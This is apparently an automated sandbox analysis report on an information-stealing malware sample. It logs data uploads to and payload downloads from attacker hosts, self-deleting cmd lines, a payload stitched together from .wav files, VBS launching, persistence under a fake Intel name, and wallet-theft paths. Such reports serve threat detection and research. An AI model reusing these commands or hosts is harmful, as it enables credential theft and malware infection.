00 00 00 a4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 10 0e 00 00 f0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 18 ef 00 00 00 00 16 00 00 f0 00 00 00 a6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d6 0f 00 00 00 f0 16 00 00 10 00 00 00 b8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: GET /1N5Jh7 HTTP/1.1 | Accept: */* | Accept-Language: en-us | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: iplogger.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /index.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=--------------------------- | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36 | Host: pacdpo22.top | Content-Length: 73148 | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /index.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=--------------------------- | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36 | Host: moreil02.top | Content-Length: 73136 | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /download.php?file=lv.exe HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: zukelx03.top | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /downfiles/lv.exe HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: zukelx03.top | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /json HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: ip-api.com | Connection: Keep-Alive
Source: Bisogna.exe.com, 00000018.00000002.585871027.00000000039B2000.00000004.00000001.sdmp | String found in binary or memory: http://223.252.173.63/4r5tgh/fcvgbth654/fv5yh.exehttps://iplogger.org/1N5Jh7string
Source: File.exe, 0000000A.00000002.321537185.0000000000420000.00000004.00020000.sdmp, wheezy.exe.10.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: File.exe, 0000000A.00000002.321537185.0000000000420000.00000004.00020000.sdmp, wheezy.exe.10.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: File.exe, 0000000A.00000002.321537185.0000000000420000.00000004.00020000.sdmp, wheezy.exe.10.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: wheezy.exe.10.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: File.exe, 0000000A.00000002.321537185.0000000000420000.00000004.00020000.sdmp, wheezy.exe.10.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: wheezy.exe.10.dr | String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: File.exe, 0000000A.00000002.321537185.0000000000420000.00000004.00020000.sdmp, wheezy.exe.10.dr | String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: File.exe, 0000000A.00000002.321537185.0000000000420000.00000004.00020000.sdmp, wheezy.exe.10.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: File.exe, 0000000A.00000002.321537185.0000000000420000.00000004.00020000.sdmp, wheezy.exe.10.dr | String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: File.exe, 0000000A.00000002.321537185.0000000000420000.00000004.00020000.sdmp, wheezy.exe.10.dr | String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: Bisogna.exe.com, 00000018.00000002.585253157.00000000038D6000.00000004.00000001.sdmp | String found in binary or memory: http://ip-api.com/json
Source: Bisogna.exe.com, 00000018.00000002.585253157.00000000038D6000.00000004.00000001.sdmp, Bisogna.exe.com, 00000018.00000002.580849231.0000000000C93000.00000004.00000001.sdmp | String found in binary or memory: http://ip-api.com/jsonC:
Source: Bisogna.exe.com, 00000018.00000002.585253157.00000000038D6000.00000004.00000001.sdmp | String found in binary or memory: http://ip-api.com/jsonH
Source: Bisogna.exe.com, 00000018.00000002.585253157.00000000038D6000.00000004.00000001.sdmp | String found in binary or memory: http://ip-api.com/jsonQ
Source: Bisogna.exe.com, 00000018.00000002.585871027.00000000039B2000.00000004.00000001.sdmp, Bisogna.exe.com, 00000018.00000002.585433806.0000000003918000.00000004.00000001.sdmp | String found in binary or memory: http://ip-api.com/jsoncountryCodeinvalid
Source: Bisogna.exe.com, 00000018.00000002.585253157.00000000038D6000.00000004.00000001.sdmp | String found in binary or memory: http://ip-api.com/jsonq
Source: File.exe, 0000000A.00000002.321489177.0000000000409000.00000002.00020000.sdmp, File.exe.0.dr | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: File.exe, 0000000A.00000002.321537185.0000000000420000.00000004.00020000.sdmp, wheezy.exe.10.dr | String found in binary or memory: http://ocsp.digicert.com0C
Source: File.exe, 0000000A.00000002.321537185.0000000000420000.00000004.00020000.sdmp, wheezy.exe.10.dr | String found in binary or memory: http://ocsp.digicert.com0N
Source: File.exe, 0000000A.00000002.321537185.0000000000420000.00000004.00020000.sdmp, wheezy.exe.10.dr | String found in binary or memory: http://ocsp.digicert.com0O
Source: 7yyqdBJVGf.exe, 00000000.00000003.296660042.0000000002E58000.00000004.00000001.sdmp | String found in binary or memory: http://pacdpo22.top/index.php
Source: File.exe, 0000000A.00000002.321537185.0000000000420000.00000004.00020000.sdmp, wheezy.exe.10.dr | String found in binary or memory: http://www.digicert.com/CPS0
Source: 7yyqdBJVGf.exe, 00000000.00000002.316458179.0000000005220000.00000004.00000001.sdmp | String found in binary or memory: http://zukelx03.top/downfiles/lv.exe
Source: 7yyqdBJVGf.exe, 7yyqdBJVGf.exe, 00000000.00000002.315679467.0000000000400000.00000040.00020000.sdmp | String found in binary or memory: http://zukelx03.top/download.php?file=lv.exe
Source: Bisogna.exe.com, 00000018.00000002.585433806.0000000003918000.00000004.00000001.sdmp | String found in binary or memory: https://2no.co/2T4yW6UShttp://223.252.173.63/4r5tgh/fcvgbth654/fv5yh.exehttps://iplogger.org/1N5Jh7s
Source: 7yyqdBJVGf.exe, 00000000.00000003.300027811.000000000524C000.00000004.00000001.sdmp, default_webdata.db.0.dr | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 7yyqdBJVGf.exe, 00000000.00000003.300027811.000000000524C000.00000004.00000001.sdmp, default_webdata.db.0.dr | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 7yyqdBJVGf.exe, 00000000.00000003.300027811.000000000524C000.00000004.00000001.sdmp, default_webdata.db.0.dr | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 7yyqdBJVGf.exe, 00000000.00000003.300027811.000000000524C000.00000004.00000001.sdmp, default_webdata.db.0.dr | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 7yyqdBJVGf.exe, 00000000.00000003.300027811.000000000524C000.00000004.00000001.sdmp, default_webdata.db.0.dr | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: File.exe, 0000000A.00000002.321537185.0000000000420000.00000004.00020000.sdmp, wheezy.exe.10.dr | String found in binary or memory: https://evernote.com/
Source: Bisogna.exe.com, 00000018.00000002.580386952.0000000000BB0000.00000004.00000020.sdmp, Bisogna.exe.com, 00000018.00000002.585871027.00000000039B2000.00000004.00000001.sdmp, wscript.exe, 00000029.00000003.581967633.0000000005773000.00000004.00000040.sdmp | String found in binary or memory: https://iplogger.org/1N5Jh7
Source: 7yyqdBJVGf.exe, 00000000.00000002.316164733.0000000002E60000.00000004.00000001.sdmp | String found in binary or memory: https://login.live.com
Source: Bisogna.exe.com, 00000018.00000002.585871027.00000000039B2000.00000004.00000001.sdmp | String found in binary or memory: https://login.live.comXf;
Source: 7yyqdBJVGf.exe, 00000000.00000003.300027811.000000000524C000.00000004.00000001.sdmp, default_webdata.db.0.dr | String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: 7yyqdBJVGf.exe, 00000000.00000003.300027811.000000000524C000.00000004.00000001.sdmp, default_webdata.db.0.dr | String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: File.exe, 0000000A.00000002.321537185.0000000000420000.00000004.00020000.sdmp, wheezy.exe.10.dr | String found in binary or memory: https://www.digicert.com/CPS0
Source: 7yyqdBJVGf.exe, 00000000.00000003.300027811.000000000524C000.00000004.00000001.sdmp, default_webdata.db.0.dr | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: unknown | DNS traffic detected: queries for: pacdpo22.top
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe | Code function: 0_2_0040E340 CreateFileW,CreateDirectoryW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetModuleFileNameW,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,RegQueryValueExW,RegQueryValueExW,RegCloseKey,ExpandEnvironmentStringsW,GetFileAttributesW,GetUserDefaultLocaleName,GetKeyboardLayoutList,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoW,LocalFree,_strftime,_strftime,GetUserNameW,GetComputerNameW,RegOpenKeyExW,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,RegCloseKey,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,GetSystemInfo,GlobalMemoryStatusEx,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,CopyFileW,CreateDirectoryW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,Sleep,Sleep,Sleep,Sleep,Sleep,ExpandEnvironmentStringsW,DeleteFileW,Sleep,URLDownloadToFileW,Sleep,CreateFileW,CloseHandle,ShellExecuteW,
Source: global traffic | HTTP traffic detected: GET /1N5Jh7 HTTP/1.1 | Accept: */* | Accept-Language: en-us | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: iplogger.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /download.php?file=lv.exe HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: zukelx03.top | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /downfiles/lv.exe HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: zukelx03.top | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /json HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: ip-api.com | Connection: Keep-Alive
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49849
Source: unknown | Network traffic detected: HTTP traffic on port 49849 -> 443
Source: unknown | HTTP traffic detected: POST /index.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=--------------------------- | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36 | Host: pacdpo22.top | Content-Length: 73148 | Cache-Control: no-cache
Source: unknown | HTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.7:49849 version: TLS 1.2
Source: C:\Users\user\AppData\Local\Temp\File.exe | Code function: 10_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,
Source: C:\Users\user\AppData\Local\Temp\File.exe | Code function: 10_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe | Code function: 0_2_0040B180 RegQueryValueExW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetDesktopWindow,GetWindowRect,GetWindowDC,GetDeviceCaps,CreateCompatibleDC,CreateDIBSection,DeleteDC,DeleteDC,DeleteDC,GdiplusShutdown,SaveDC,SelectObject,BitBlt,RestoreDC,DeleteDC,DeleteDC,DeleteDC,GdipAlloc,GdipCreateBitmapFromHBITMAP,GdipGetImageEncodersSize,GdipGetImageEncoders,GdipSaveImageToFile,DeleteObject,GdiplusShutdown,CopyFileW,

                      System Summary:

                      Submitted sample is a known malware sample
                      Source: C:\Windows\SysWOW64\cmd.exe Dropped file: MD5: ac6ad5d9b99757c3a878f2d275ace198 Family: APT37 Alias: Reaper group, Geumseong121, Group 123, Scarcruft, APT-S-008, Red Eyes, TEMP.Reaper, Ricochet Chollima, sun team, APT37 Description: APT37 is a suspected North Korean cyber espionage group that has been in operation since at least 2012. Their targets are primarily located in South Korea, but also Japan, Vietnam, Russia, China, India, and some of the countries in the Middle East. A wider range of industries are affected, including chemicals, electronics, manufacturing, aerospace, automotive and healthcare entities. References: https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf https://securelist.com/operation-daybreak/75100/ https://securelist.com/scarcruft-continues-to-evolve-introduces-bluetooth-harvester/90729/ Data Source: https://github.com/RedDrip7/APT_Digital_Weapon
                      PE file contains section with special chars
                      Source: parted.exe.10.dr Static PE information: section name:
                      Source: parted.exe.10.dr Static PE information: section name:
                      Source: parted.exe.10.dr Static PE information: section name:
                      Source: parted.exe.10.dr Static PE information: section name:
                      Source: parted.exe.10.dr Static PE information: section name:
                      Source: parted.exe.10.dr Static PE information: section name:
                      Source: parted.exe.10.dr Static PE information: section name:
                      Source: IntelRapid.exe.15.dr Static PE information: section name:
                      Source: IntelRapid.exe.15.dr Static PE information: section name:
                      Source: IntelRapid.exe.15.dr Static PE information: section name:
                      Source: IntelRapid.exe.15.dr Static PE information: section name:
                      Source: IntelRapid.exe.15.dr Static PE information: section name:
                      Source: IntelRapid.exe.15.dr Static PE information: section name:
                      Source: IntelRapid.exe.15.dr Static PE information: section name:
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Code function: 0_2_004140F0
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Code function: 0_2_00414800
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Code function: 0_2_0041BF2F
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Code function: 0_2_00434000
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Code function: 0_2_0041C194
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Code function: 0_2_00412210
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Code function: 0_2_0042E2EE
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Code function: 0_2_00411650
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Code function: 0_2_00430B0C
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Code function: 0_2_00422BF0
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Code function: 0_2_00420C29
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Code function: 0_2_00430C2C
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Code function: 0_2_0041BCFD
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Code function: 0_2_00413D80
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Code function: 0_2_00432FBD
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Code function: 0_2_03094340
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Code function: 0_2_0309C3E4
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Code function: 0_2_030B320D
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Code function: 0_2_0309C17F
                      Source: C:\Users\user\AppData\Local\Temp\File.exe Code function: 10_2_0040737E
                      Source: C:\Users\user\AppData\Local\Temp\File.exe Code function: 10_2_00406EFE
                      Source: C:\Users\user\AppData\Local\Temp\File.exe Code function: 10_2_004079A2
                      Source: C:\Users\user\AppData\Local\Temp\File.exe Code function: 10_2_004049A8
                      Source: C:\Users\user\AppData\Local\Temp\dislip\wheezy.exe Code function: 13_2_004E9871
                      Source: C:\Users\user\AppData\Local\Temp\dislip\wheezy.exe Code function: 13_2_004EA81D
                      Source: C:\Users\user\AppData\Local\Temp\dislip\wheezy.exe Code function: 13_2_004EA418
                      Source: C:\Users\user\AppData\Local\Temp\dislip\wheezy.exe Code function: 13_2_004E9551
                      Source: C:\Users\user\AppData\Local\Temp\dislip\wheezy.exe Code function: 13_2_004E9BE8
                      Source: C:\Users\user\AppData\Local\Temp\dislip\wheezy.exe Code function: 13_2_004E9FB0
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.com Process Stats: CPU usage > 98%
                      Source: lv[1].exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: lv[1].exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: lv[1].exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: File.exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: File.exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: File.exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: wheezy.exe.10.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: wheezy.exe.10.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 7yyqdBJVGf.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: C:\Users\user\AppData\Local\Temp\File.exe Code function: 10_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,
                      Source: C:\Users\user\AppData\Local\Temp\dislip\wheezy.exe Code function: 13_2_004E1B23 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,
                      Source: C:\Users\user\AppData\Local\Temp\dislip\wheezy.exe Code function: 13_2_004E1FEA ExitWindowsEx,
                      Source: C:\Users\user\AppData\Local\Temp\File.exe Code function: String function: 004062CF appears 58 times
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Code function: String function: 00417470 appears 50 times
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Code function: String function: 0040FAF0 appears 56 times
                      Source: lv[1].exe.0.dr Static PE information: Section: .reloc ZLIB complexity 1.00268554688
                      Source: File.exe.0.dr Static PE information: Section: .reloc ZLIB complexity 1.00268554688
                      Source: parted.exe.10.dr Static PE information: Section: ZLIB complexity 0.998956853693
                      Source: parted.exe.10.dr Static PE information: Section: ZLIB complexity 0.989397321429
                      Source: IntelRapid.exe.15.dr Static PE information: Section: ZLIB complexity 0.998956853693
                      Source: IntelRapid.exe.15.dr Static PE information: Section: ZLIB complexity 0.989397321429
                      Source: 7yyqdBJVGf.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exe File created: C:\Users\user\AppData\Roaming\aumaga
                      Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@34/34@6/7
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exe File read: C:\Users\desktop.ini
                      Source: C:\Users\user\AppData\Local\Temp\dislip\wheezy.exe Code function: 13_2_004E40C8 GetCurrentDirectoryA,SetCurrentDirectoryA,SetCurrentDirectoryA,memset,GetLastError,FormatMessageA,GetVolumeInformationA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,SetCurrentDirectoryA,
                      Source: C:\Users\user\AppData\Local\Temp\dislip\wheezy.exe Code function: 13_2_004E54CE GetDlgItem,GetDlgItem,ShowWindow,ShowWindow,GetDlgItem,ShowWindow,FreeResource,SendMessageA,
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.com Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user~1\AppData\Local\Temp\lmlpnsexh.vbs'
                      Source: C:\Users\user\AppData\Local\Temp\File.exe File created: C:\Program Files (x86)\foler
                      Source: 7yyqdBJVGf.exe Virustotal: Detection: 52%
                      Source: 7yyqdBJVGf.exe ReversingLabs: Detection: 48%
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknown Process created: C:\Users\user\Desktop\7yyqdBJVGf.exe 'C:\Users\user\Desktop\7yyqdBJVGf.exe'
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Process created: C:\Users\user\AppData\Local\Temp\File.exe 'C:\Users\user~1\AppData\Local\Temp\File.exe'
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /c rd /s /q C:\Users\user~1\AppData\Local\Temp\djUYPUrixI & timeout 4 & del /f /q 'C:\Users\user\Desktop\7yyqdBJVGf.exe'
                      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\File.exe Process created: C:\Users\user\AppData\Local\Temp\dislip\wheezy.exe C:\Users\user~1\AppData\Local\Temp\dislip\wheezy.exe
                      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 4
                      Source: C:\Users\user\AppData\Local\Temp\File.exe Process created: C:\Users\user\AppData\Local\Temp\dislip\parted.exe C:\Users\user~1\AppData\Local\Temp\dislip\parted.exe
                      Source: C:\Users\user\AppData\Local\Temp\dislip\wheezy.exe Process created: C:\Windows\SysWOW64\dllhost.exe dllhost.exe
                      Source: C:\Users\user\AppData\Local\Temp\dislip\wheezy.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c cmd < Quegli.wav
                      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd
                      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /V /R '^DUaegCnUMchmsYAygRiDFQbmDzwCKZUZJepHBYJZehdUDKbgCOorIoZNvTmUBVpMAhPfPTEdoiBamDVSWNqWRRdBeclInOnitDzdUonJlSVAHHhSXGYOUhVJWgj$' Bel.wav
                      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.com Bisogna.exe.com l
                      Source: C:\Users\user\AppData\Local\Temp\dislip\parted.exe Process created: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe
                      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.com Process created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.com C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.com l
                      Source: unknown Process created: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe
                      Source: unknown Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Windows\system32\advpack.dll,DelNodeRunDLL32 'C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\'
                      Source: unknown Process created: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe 'C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe'
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.com Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user~1\AppData\Local\Temp\lmlpnsexh.vbs'
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exe File created: C:\Users\user~1\AppData\Local\Temp\kCFlwhS
                      Source: C:\Users\user\AppData\Local\Temp\File.exe Code function: 10_2_004024FB CoCreateInstance,
                      Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4976:120:WilError_01
                      Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe Mutant created: \Sessions\1\BaseNamedObjects\{37529D08-A67E-40B3-B0F2-EB87331B47F5}
                      Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5508:120:WilError_01
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Command line argument: %Temp%\
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Command line argument: %Temp%\
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Command line argument: \_Files
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Command line argument: %Temp%\
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Command line argument: \_Files\_Files
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Command line argument: %Temp%\
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exe Command line argument: \_Files\_Wallet
